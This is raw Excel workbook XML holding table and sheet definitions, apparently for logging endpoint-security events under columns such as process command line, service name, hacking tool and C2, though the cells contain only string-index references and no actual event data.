  <autoFilter ref="A1:I2" xr:uid="{E64EA689-2FC8-3141-9A8F-1EF0AB31C6B0}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{430D8F0F-F309-A447-B635-57783A3244AD}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{74F30E93-491D-304C-B285-629625F57DAE}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{2114D142-483B-F94A-8494-FC0640B0DDE4}" name="description"/>
    <tableColumn id="4" xr3:uid="{DCAA6585-3A50-F949-94DA-5580291ADD70}" name="service_file_name" dataDxfId="6"/>
    <tableColumn id="5" xr3:uid="{DDC45B2A-9791-0846-8424-32ED3E7D1131}" name="service_account"/>
    <tableColumn id="6" xr3:uid="{950DF27C-0494-7F42-93BD-341EE7837886}" name="service_name"/>
    <tableColumn id="7" xr3:uid="{EDA29B50-C12D-AB4E-8616-1C2FD3CF5FF3}" name="start_type"/>
    <tableColumn id="8" xr3:uid="{16999B6A-CF8A-0946-A7D3-3F2550673170}" name="data_object"/>
    <tableColumn id="9" xr3:uid="{3D97CF97-CFC6-E64D-A112-21AC20C99DB1}" name="ns_meta"/>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4A08C6D-D657-4644-9DEE-D97E7C54BD4A}" name="Table17" displayName="Table17" ref="A1:J2" totalsRowShown="0" headerRowDxfId="5">
  <autoFilter ref="A1:J2" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{075982B2-D9B0-3C47-B87C-6EF935F30C8D}" name="delta_eid"/>
    <tableColumn id="5" xr3:uid="{663B1C5C-0C35-C14F-BB0F-5A183E4A964D}" name="delta_pid"/>
    <tableColumn id="15" xr3:uid="{C297D268-54DA-A247-927D-5DC6CC3D69B2}" name="description"/>
    <tableColumn id="2" xr3:uid="{46683219-8731-7046-8081-4FB169595DC4}" name="type"/>
    <tableColumn id="3" xr3:uid="{0085B374-9827-E74E-9C63-A78E9D941E44}" name="process_cmdline"/>
    <tableColumn id="7" xr3:uid="{7D54383E-AD89-ED4B-BEB3-2DDC779C172A}" name="initiating_process_cmdline" dataDxfId="4"/>
    <tableColumn id="8" xr3:uid="{A9FA031D-DFE0-3749-A7A7-AC3B1963F72E}" name="initiating_process_name"/>
    <tableColumn id="9" xr3:uid="{648CCB34-61F6-134C-8402-3152E937628F}" name="initiating_process_name_parent"/>
    <tableColumn id="13" xr3:uid="{C681219C-5A25-E64B-974F-AC16C2DECB2D}" name="object" dataDxfId="3"/>
    <tableColumn id="14" xr3:uid="{A4789700-80F6-F347-A4FC-CDD7F427B6ED}" name="ns_meta"/>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E1F5E3D-3834-1C40-AC33-C82C745B36BB}" name="Table5" displayName="Table5" ref="A1:H4" totalsRowShown="0" headerRowDxfId="2">
  <autoFilter ref="A1:H4" xr:uid="{1E1F5E3D-3834-1C40-AC33-C82C745B36BB}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{53DB3C84-153A-E142-A8C5-110AC288F04C}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{10F9C4F3-77E9-D84D-AC7F-3051583A0269}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{E8E91BF0-8A9C-1344-95FB-DEA577EF2D2C}" name="description" dataDxfId="1"/>
    <tableColumn id="4" xr3:uid="{37BEC6ED-57E5-064F-868B-85CD4916F372}" name="htool"/>
    <tableColumn id="5" xr3:uid="{E32BCE69-89C4-1949-8655-34151E7DE518}" name="hscript"/>
    <tableColumn id="6" xr3:uid="{4A7AD5AE-F0E3-B549-A1DA-3771BAC40BEB}" name="c2"/>
    <tableColumn id="7" xr3:uid="{E7EB26DD-FFC1-0E4D-AB2E-E18E4B79C58C}" name="evidence" dataDxfId="0"/>
    <tableColumn id="8" xr3:uid="{FD2FD0D2-F1F6-2A43-BA6C-F5FD6E6C80ED}" name="ns_meta"/>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911FB-D4AC-8940-90EB-2E537F4E7815}">
  <dimension ref="A1:G1"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G17" sqref="G17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="5" max="5" width="12.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>6</v>
      </c>
      <c r="B1" t="s">
        <v>0</v>
      </c>
      <c r="C1" t="s">
        <v>8</v>
      </c>
      <c r="D1" t="s">
        <v>43</v>
      </c>
      <c r="E1" t="s">
        <v>44</v>
      </c>
      <c r="F1" t="s">
        <v>31</v>
      </c>
      <c r="G1"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7698E-4B75-3942-98B8-C825FE8EE637}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A20" sqref="A20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>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D4B96-2A70-8F41-82BB-D13A0D8F922A}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F11" sqref="F11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>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F124B-0D0F-4944-9A22-4A3E89799EA8}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A14" sqref="A14:A15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3"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9A292-5E18-1D44-9D7A-060851331C4E}">
  <dimension ref="A1:L139"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A97" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="L135" sqref="L135"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="17.1640625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="36.83203125" style="1" customWidth="1"/>
    <col min="4" max="4" width="92.6640625" style="1" customWidth="1"/>
    <col min="5" max="5" width="90" customWidth="1"/>
    <col min="6" max="6" width="15.83203125" customWidth="1"/>
    <col min="7" max="7" width="24.5" customWidth="1"/>
    <col min="8" max="8" width="29.1640625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="23.1640625" style="1" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="21.83203125" customWidth="1"/>
    <col min="11" max="11" width="42.33203125" customWidth="1"/>
    <col min="12" max="12" width="172.33203125" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="5" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>1</v>
      </c>
      <c r="E1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>16</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>17</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>42</v>
      </c>
      <c r="K1" s="4" t="s">
        <v>31</v>
      </c>
      <c r="L1" s="5" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A2" s="1"/>
      <c r="C2" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E2" s="1"/>
      <c r="L2" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="3" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C3" s="1" t="s">
        <v>50</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E3" s="1"/>
      <c r="L3" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="68" x14ac:dyDescent="0.2">
      <c r="C4" s="1" t="s">
        <v>51</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E4" s="1"/>
      <c r="L4" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D5" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E5" s="1"/>
      <c r="L5" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D6" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E6" s="1"/>
      <c r="L6" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="7" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D7" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E7" s="1"/>
      <c r="L7" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D8" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E8" s="1"/>
      <c r="L8" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="85" x14ac:dyDescent="0.2">
      <c r="D9" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E9" s="1"/>
      <c r="L9" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="10" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D10" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E10" s="1"/>
      <c r="L10" s="1" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="11" spans="1:12" ht="409.5" x14ac:dyDescent="0.2">
      <c r="D11" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E11" s="1"/>
      <c r="L11" s="1" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="12" spans="1:12" ht="409.5" x14ac:dyDescent="0.2">
      <c r="D12" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E12" s="1"/>
      <c r="L12" s="1" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="13" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="D13" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E13" s="1"/>
      <c r="L13" s="1" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="14" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D14" s="1" t="s">
        <v>61</v>
      </c>
      <c r="E14" s="1"/>
      <c r="L14" s="1" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="15" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D15" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E15" s="1"/>
      <c r="L15" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="16" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D16" s="1" t="s">
        <v>65</v>
      </c>
      <c r="E16" s="1"/>
      <c r="L16" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="17" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D17" s="1" t="s">
        <v>65</v>
      </c>
      <c r="E17" s="1"/>
      <c r="L17" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="18" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C18" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>66</v>
      </c>
      <c r="E18" s="1"/>
      <c r="L18" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="19" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C19" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>67</v>
      </c>
      <c r="E19" s="1"/>
      <c r="L19" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="20" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C20" s="1" t="s">
        <v>169</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>68</v>
      </c>
      <c r="E20" s="1"/>
      <c r="L20" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="21" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C21" s="1" t="s">
        <v>158</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>69</v>
      </c>
      <c r="E21" s="1"/>
      <c r="L21" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="22" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D22" s="1" t="s">
        <v>70</v>
      </c>
      <c r="E22" s="1"/>
      <c r="L22" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="23" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C23" s="1" t="s">
        <v>159</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>71</v>
      </c>
      <c r="E23" s="1"/>
      <c r="L23" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="24" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C24" s="1" t="s">
        <v>160</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E24" s="1"/>
      <c r="L24" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="25" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C25" s="1" t="s">
        <v>160</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>73</v>
      </c>
      <c r="E25" s="1"/>
      <c r="L25" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="26" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D26" s="1" t="s">
        <v>74</v>
      </c>
      <c r="E26" s="1"/>
      <c r="L26" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="27" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D27" s="1" t="s">
        <v>75</v>
      </c>
      <c r="E27" s="1"/>
      <c r="L27" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="28" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C28" s="1" t="s">
        <v>161</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>76</v>
      </c>
      <c r="E28" s="1"/>
      <c r="L28" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="29" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C29" s="1" t="s">
        <v>162</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>77</v>
      </c>
      <c r="E29" s="1"/>
      <c r="L29" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="30" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C30" s="1" t="s">
        <v>163</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>78</v>
      </c>
      <c r="E30" s="1"/>
      <c r="L30" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="31" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C31" s="1" t="s">
        <v>164</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>79</v>
      </c>
      <c r="E31" s="1"/>
      <c r="L31" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="32" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D32" s="1" t="s">
        <v>82</v>
      </c>
      <c r="E32" s="1"/>
      <c r="L32" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="33" spans="3:12" ht="119" x14ac:dyDescent="0.2">
      <c r="C33" s="1" t="s">
        <v>165</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>80</v>
      </c>
      <c r="E33" s="1"/>
      <c r="L33" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="34" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C34" s="1" t="s">
        <v>166</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>81</v>
      </c>
      <c r="E34" s="1"/>
      <c r="L34" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="35" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C35" s="1" t="s">
        <v>167</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>82</v>
      </c>
      <c r="E35" s="1"/>
      <c r="L35" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="36" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D36" s="1" t="s">
        <v>83</v>
      </c>
      <c r="E36" s="1"/>
      <c r="L36" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="37" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C37" s="1" t="s">
        <v>168</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>84</v>
      </c>
      <c r="E37" s="1"/>
      <c r="L37" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="38" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C38" s="1" t="s">
        <v>157</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>85</v>
      </c>
      <c r="E38" s="1"/>
      <c r="L38" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="39" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C39" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>86</v>
      </c>
      <c r="E39" s="1"/>
      <c r="L39" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="40" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C40" s="1" t="s">
        <v>170</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>87</v>
      </c>
      <c r="E40" s="1"/>
      <c r="L40" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="41" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C41" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>88</v>
      </c>
      <c r="E41" s="1"/>
      <c r="L41" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="42" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D42" s="1" t="s">
        <v>184</v>
      </c>
      <c r="E42" s="1"/>
      <c r="L42" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="43" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D43" s="1" t="s">
        <v>185</v>
      </c>
      <c r="E43" s="1"/>
      <c r="L43" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="44" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C44" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>89</v>
      </c>
      <c r="E44" s="1"/>
      <c r="L44" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="45" spans="3:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C45" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>90</v>
      </c>
      <c r="E45" s="1"/>
      <c r="L45" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="46" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C46" s="1" t="s">
        <v>171</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>186</v>
      </c>
      <c r="E46" s="1"/>
      <c r="L46" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="47" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C47" s="1" t="s">
        <v>160</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>172</v>
      </c>
      <c r="E47" s="1"/>
      <c r="L47" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="48" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C48" s="1" t="s">
        <v>157</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>173</v>
      </c>
      <c r="E48" s="1"/>
      <c r="L48" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="49" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D49" s="1" t="s">
        <v>174</v>
      </c>
      <c r="E49" s="1"/>
      <c r="L49" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="50" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C50" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>175</v>
      </c>
      <c r="E50" s="1"/>
      <c r="L50" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="51" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C51" s="1" t="s">
        <v>190</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>176</v>
      </c>
      <c r="E51" s="1"/>
      <c r="L51" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="52" spans="3:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C52" s="1" t="s">
        <v>171</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>178</v>
      </c>
      <c r="E52" s="1"/>
      <c r="L52" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="53" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D53" s="1" t="s">
        <v>124</v>
      </c>
      <c r="E53" s="1"/>
      <c r="L53" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="54" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D54" s="1" t="s">
        <v>123</v>
      </c>
      <c r="E54" s="1"/>
      <c r="L54" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="55" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D55" s="1" t="s">
        <v>122</v>
      </c>
      <c r="E55" s="1"/>
      <c r="L55" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="56" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C56" s="1" t="s">
        <v>179</v>
      </c>
      <c r="D56" s="1" t="s">
        <v>121</v>
      </c>
      <c r="E56" s="1"/>
      <c r="L56" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="57" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C57" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>120</v>
      </c>
      <c r="E57" s="1"/>
      <c r="L57" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="58" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C58" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D58" s="1" t="s">
        <v>119</v>
      </c>
      <c r="E58" s="1"/>
      <c r="L58" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="59" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D59" s="1" t="s">
        <v>114</v>
      </c>
      <c r="E59" s="1"/>
      <c r="L59" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="60" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D60" s="1" t="s">
        <v>115</v>
      </c>
      <c r="E60" s="1"/>
      <c r="L60" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="61" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D61" s="1" t="s">
        <v>116</v>
      </c>
      <c r="E61" s="1"/>
      <c r="L61" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="62" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D62" s="1" t="s">
        <v>117</v>
      </c>
      <c r="E62" s="1"/>
      <c r="L62" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="63" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D63" s="1" t="s">
        <v>118</v>
      </c>
      <c r="E63" s="1"/>
      <c r="L63" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="64" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C64" s="1" t="s">
        <v>180</v>
      </c>
      <c r="D64" s="1" t="s">
        <v>113</v>
      </c>
      <c r="E64" s="1"/>
      <c r="L64" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="65" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C65" s="1" t="s">
        <v>191</v>
      </c>
      <c r="D65" s="1" t="s">
        <v>112</v>
      </c>
      <c r="E65" s="1"/>
      <c r="L65" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="66" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C66" s="1" t="s">
        <v>192</v>
      </c>
      <c r="D66" s="1" t="s">
        <v>111</v>
      </c>
      <c r="E66" s="1"/>
      <c r="L66" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="67" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C67" s="1" t="s">
        <v>192</v>
      </c>
      <c r="D67" s="1" t="s">
        <v>109</v>
      </c>
      <c r="E67" s="1"/>
      <c r="L67" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="68" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C68" s="1" t="s">
        <v>159</v>
      </c>
      <c r="D68" s="1" t="s">
        <v>110</v>
      </c>
      <c r="E68" s="1"/>
      <c r="L68" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="69" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D69" s="1" t="s">
        <v>105</v>
      </c>
      <c r="E69" s="1"/>
      <c r="L69" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="70" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D70" s="1" t="s">
        <v>106</v>
      </c>
      <c r="E70" s="1"/>
      <c r="L70" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="71" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C71" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D71" s="1" t="s">
        <v>108</v>
      </c>
      <c r="E71" s="1"/>
      <c r="L71" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="72" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C72" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D72" s="1" t="s">
        <v>107</v>
      </c>
      <c r="E72" s="1"/>
      <c r="L72" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="73" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C73" s="1" t="s">
        <v>157</v>
      </c>
      <c r="D73" s="1" t="s">
        <v>182</v>
      </c>
      <c r="E73" s="1"/>
      <c r="L73" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="74" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D74" s="1" t="s">
        <v>104</v>
      </c>
      <c r="E74" s="1"/>
      <c r="L74" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="75" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C75" s="1" t="s">
        <v>183</v>
      </c>
      <c r="D75" s="1" t="s">
        <v>103</v>
      </c>
      <c r="E75" s="1"/>
      <c r="L75" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="76" spans="3:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C76" s="1" t="s">
        <v>160</v>
      </c>
      <c r="D76" s="1" t="s">
        <v>102</v>
      </c>
      <c r="E76" s="1"/>
      <c r="L76" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="77" spans="3:12" ht="34" x14ac:dyDescent="0.2">
